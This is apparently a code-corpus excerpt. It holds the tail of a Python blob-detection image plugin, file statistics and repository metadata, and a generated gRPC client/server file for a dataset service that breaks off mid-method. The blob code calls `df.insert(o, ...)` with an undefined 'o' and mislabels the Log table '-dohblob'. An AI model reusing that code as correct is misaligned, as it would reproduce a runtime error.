layer['body'].append({'type':'texts', 'body':[
(x,y,'id=%d'%i) for (x,y),i in zip(pts[:,1::-1], fid)]})
mark['body'][i] = layer
ips.mark = GeometryMark(mark)
df = pd.DataFrame(np.vstack(data)*ips.unit[0], columns = ['X', 'Y', 'R'])
df.insert(0, 'FID', fid)
if para['slice']: df.insert(o, 'SliceID', sid)
IPy.show_table(df, ips.title+'-dohblob')
class Log(Simple):
title = 'Blob Log'
note = ['all', 'preview']
para = {'min_sigma':1, 'max_sigma':30, 'num_sigma':10, 'threshold':0.1, 'overlap':0.5,
'log_scale':False, 'showid':True, 'exclude_border':False, 'slice':False}
view = [(int, 'min_sigma', (1, 50), 0, 'min', 'sigma'),
(int, 'max_sigma', (1, 50), 0, 'max', 'sigma'),
(int, 'num_sigma', (5, 30), 0, 'num', 'sigma'),
(float, 'threshold', (0.01, 1), 2, 'threshold', '0.02~1'),
(float, 'overlap', (0, 10), 1, 'overlap', ''),
(bool, 'log_scale', 'log scale'),
(bool, 'exclude_border', 'exclude border'),
(bool, 'showid', 'show id on image'),
(bool, 'slice', 'slice')]
def preview(self, ips, para):
grayimg = ips.img if ips.img.ndim==2 else ips.img.mean(axis=-1)
grayimg /= grayimg.max()
pts = blob_log(grayimg, min_sigma=para['min_sigma'], max_sigma=para['max_sigma'],
num_sigma=para['num_sigma'], threshold=para['threshold'],
overlap=para['overlap'], log_scale=para['log_scale'], exclude_border=para['exclude_border'])
pts[:,2] *= np.sqrt(2)
ips.mark = GeometryMark({'type':'circles', 'body':pts[:,[1,0,2]]})
def cancel(self, ips): ips.mark = None
def run(self, ips, imgs, para = None):
if not para['slice']:imgs = [ips.img]
data, sid, fid, mark = [], [], [], {'type':'layers', 'body':{}}
for i in range(len(imgs)):
grayimg = imgs[i] if imgs[i].ndim==2 else imgs[i].mean(axis=-1)
grayimg /= grayimg.max()
pts = blob_log(grayimg, min_sigma=para['min_sigma'], max_sigma=para['max_sigma'],
num_sigma=para['num_sigma'], threshold=para['threshold'],
overlap=para['overlap'], log_scale=para['log_scale'], exclude_border=para['exclude_border'])
pts[:,2] *= np.sqrt(2)
sid.extend([i]*len(pts))
fid.extend(range(1, len(pts)+1))
data.append(pts)
layer = {'type':'layer', 'body':[{'type':'circles', 'body':pts[:,[1,0,2]]}]}
if para['showid']:
layer['body'].append({'type':'texts', 'body':[
(x,y,'id=%d'%i) for (x,y),i in zip(pts[:,1::-1], fid)]})
mark['body'][i] = layer
ips.mark = GeometryMark(mark)
df = pd.DataFrame(np.vstack(data)*ips.unit[0], columns = ['X', 'Y', 'R'])
df.insert(0, 'FID', fid)
if para['slice']: df.insert(o, 'SliceID', sid)
IPy.show_table(df, ips.title+'-dohblob')
plgs = [Dog, Doh, Log]
| 45.294118
| 108
| 0.527922
| 1,043
| 7,700
| 3.811122
| 0.104506
| 0.042264
| 0.02717
| 0.013585
| 0.909434
| 0.909434
| 0.904151
| 0.904151
| 0.891824
| 0.883019
| 0
| 0.028322
| 0.257143
| 7,700
| 170
| 109
| 45.294118
| 0.666608
| 0
| 0
| 0.829787
| 0
| 0
| 0.186599
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06383
| false
| 0
| 0.042553
| 0
| 0.212766
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
90a1b5c698734d7d439815de91772a44270da425
| 35,108
|
py
|
Python
|
lang/python/github/com/metaprov/modelaapi/services/dataset/v1/dataset_pb2_grpc.py
|
metaprov/modelaapi
|
64ab493dd73329196235e15776e5177c72281990
|
[
"Apache-2.0"
] | 5
|
2022-02-18T03:40:10.000Z
|
2022-03-01T16:11:24.000Z
|
lang/python/github/com/metaprov/modelaapi/services/dataset/v1/dataset_pb2_grpc.py
|
metaprov/modelaapi
|
64ab493dd73329196235e15776e5177c72281990
|
[
"Apache-2.0"
] | 1
|
2022-01-07T19:59:25.000Z
|
2022-02-04T01:21:14.000Z
|
lang/python/github/com/metaprov/modelaapi/services/dataset/v1/dataset_pb2_grpc.py
|
metaprov/modelaapi
|
64ab493dd73329196235e15776e5177c72281990
|
[
"Apache-2.0"
] | 1
|
2022-03-25T10:21:43.000Z
|
2022-03-25T10:21:43.000Z
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from github.com.metaprov.modelaapi.services.dataset.v1 import dataset_pb2 as github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2
class DatasetServiceStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.ListDatasets = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/ListDatasets',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ListDatasetsRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ListDatasetsResponse.FromString,
)
self.GetDataset = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/GetDataset',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatasetRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatasetResponse.FromString,
)
self.CreateDataset = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/CreateDataset',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateDatasetRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateDatasetResponse.FromString,
)
self.UpdateDataset = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/UpdateDataset',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.UpdateDatasetRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.UpdateDatasetResponse.FromString,
)
self.DeleteDataset = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/DeleteDataset',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.DeleteDatasetRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.DeleteDatasetResponse.FromString,
)
self.CompareDatasets = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/CompareDatasets',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CompareDatasetsRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CompareDatasetsResponse.FromString,
)
self.GetDatasetProfile = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/GetDatasetProfile',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatasetProfileRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatasetProfileResponse.FromString,
)
self.CreateDatasetProfile = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/CreateDatasetProfile',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateDatasetProfileRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateDatasetProfileResponse.FromString,
)
self.CreateColumnProfile = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/CreateColumnProfile',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateColumnProfileRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateColumnProfileResponse.FromString,
)
self.GenerateDataset = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/GenerateDataset',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GenerateDatasetRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GenerateDatasetResponse.FromString,
)
self.ValidateDataset = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/ValidateDataset',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ValidateDatasetRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ValidateDatasetResponse.FromString,
)
self.UploadChunk = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/UploadChunk',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.UploadChunkRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.UploadChunkResponse.FromString,
)
self.DownloadDataset = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/DownloadDataset',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.DownloadDatasetRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.DownloadDatasetResponse.FromString,
)
self.GetDatabases = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/GetDatabases',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatabasesRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatabasesResponse.FromString,
)
self.GetTables = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/GetTables',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetTablesRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetTablesResponse.FromString,
)
self.ExecuteSql = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/ExecuteSql',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ExecuteSqlRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ExecuteSqlResponse.FromString,
)
class DatasetServiceServicer(object):
"""Missing associated documentation comment in .proto file."""
def ListDatasets(self, request, context):
"""Datasets
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetDataset(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateDataset(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateDataset(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteDataset(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CompareDatasets(self, request, context):
"""compare one or more datasets
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetDatasetProfile(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateDatasetProfile(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateColumnProfile(self, request, context):
"""Get a single column viz, we do that since we want to parallelize the computation of the viz
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GenerateDataset(self, request, context):
"""generate a syntatic dataset
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ValidateDataset(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UploadChunk(self, request, context):
"""option (google.api.http).post = "/v1/datasets/{namespace}/{name}:upload";
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DownloadDataset(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetDatabases(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetTables(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ExecuteSql(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_DatasetServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'ListDatasets': grpc.unary_unary_rpc_method_handler(
servicer.ListDatasets,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ListDatasetsRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ListDatasetsResponse.SerializeToString,
),
'GetDataset': grpc.unary_unary_rpc_method_handler(
servicer.GetDataset,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatasetRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatasetResponse.SerializeToString,
),
'CreateDataset': grpc.unary_unary_rpc_method_handler(
servicer.CreateDataset,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateDatasetRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateDatasetResponse.SerializeToString,
),
'UpdateDataset': grpc.unary_unary_rpc_method_handler(
servicer.UpdateDataset,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.UpdateDatasetRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.UpdateDatasetResponse.SerializeToString,
),
'DeleteDataset': grpc.unary_unary_rpc_method_handler(
servicer.DeleteDataset,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.DeleteDatasetRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.DeleteDatasetResponse.SerializeToString,
),
'CompareDatasets': grpc.unary_unary_rpc_method_handler(
servicer.CompareDatasets,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CompareDatasetsRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CompareDatasetsResponse.SerializeToString,
),
'GetDatasetProfile': grpc.unary_unary_rpc_method_handler(
servicer.GetDatasetProfile,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatasetProfileRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatasetProfileResponse.SerializeToString,
),
'CreateDatasetProfile': grpc.unary_unary_rpc_method_handler(
servicer.CreateDatasetProfile,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateDatasetProfileRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateDatasetProfileResponse.SerializeToString,
),
'CreateColumnProfile': grpc.unary_unary_rpc_method_handler(
servicer.CreateColumnProfile,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateColumnProfileRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateColumnProfileResponse.SerializeToString,
),
'GenerateDataset': grpc.unary_unary_rpc_method_handler(
servicer.GenerateDataset,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GenerateDatasetRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GenerateDatasetResponse.SerializeToString,
),
'ValidateDataset': grpc.unary_unary_rpc_method_handler(
servicer.ValidateDataset,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ValidateDatasetRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ValidateDatasetResponse.SerializeToString,
),
'UploadChunk': grpc.unary_unary_rpc_method_handler(
servicer.UploadChunk,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.UploadChunkRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.UploadChunkResponse.SerializeToString,
),
'DownloadDataset': grpc.unary_unary_rpc_method_handler(
servicer.DownloadDataset,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.DownloadDatasetRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.DownloadDatasetResponse.SerializeToString,
),
'GetDatabases': grpc.unary_unary_rpc_method_handler(
servicer.GetDatabases,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatabasesRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatabasesResponse.SerializeToString,
),
'GetTables': grpc.unary_unary_rpc_method_handler(
servicer.GetTables,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetTablesRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetTablesResponse.SerializeToString,
),
'ExecuteSql': grpc.unary_unary_rpc_method_handler(
servicer.ExecuteSql,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ExecuteSqlRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ExecuteSqlResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'github.com.metaprov.modelaapi.services.dataset.v1.DatasetService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class DatasetService(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def ListDatasets(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/ListDatasets',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ListDatasetsRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ListDatasetsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetDataset(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/GetDataset',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatasetRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatasetResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateDataset(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/CreateDataset',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateDatasetRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateDatasetResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateDataset(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/UpdateDataset',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.UpdateDatasetRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.UpdateDatasetResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteDataset(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/DeleteDataset',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.DeleteDatasetRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.DeleteDatasetResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CompareDatasets(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/CompareDatasets',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CompareDatasetsRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CompareDatasetsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetDatasetProfile(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/GetDatasetProfile',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatasetProfileRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatasetProfileResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateDatasetProfile(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/CreateDatasetProfile',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateDatasetProfileRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateDatasetProfileResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateColumnProfile(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/CreateColumnProfile',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateColumnProfileRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateColumnProfileResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GenerateDataset(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/GenerateDataset',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GenerateDatasetRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GenerateDatasetResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ValidateDataset(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/ValidateDataset',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ValidateDatasetRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ValidateDatasetResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UploadChunk(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/UploadChunk',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.UploadChunkRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.UploadChunkResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DownloadDataset(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
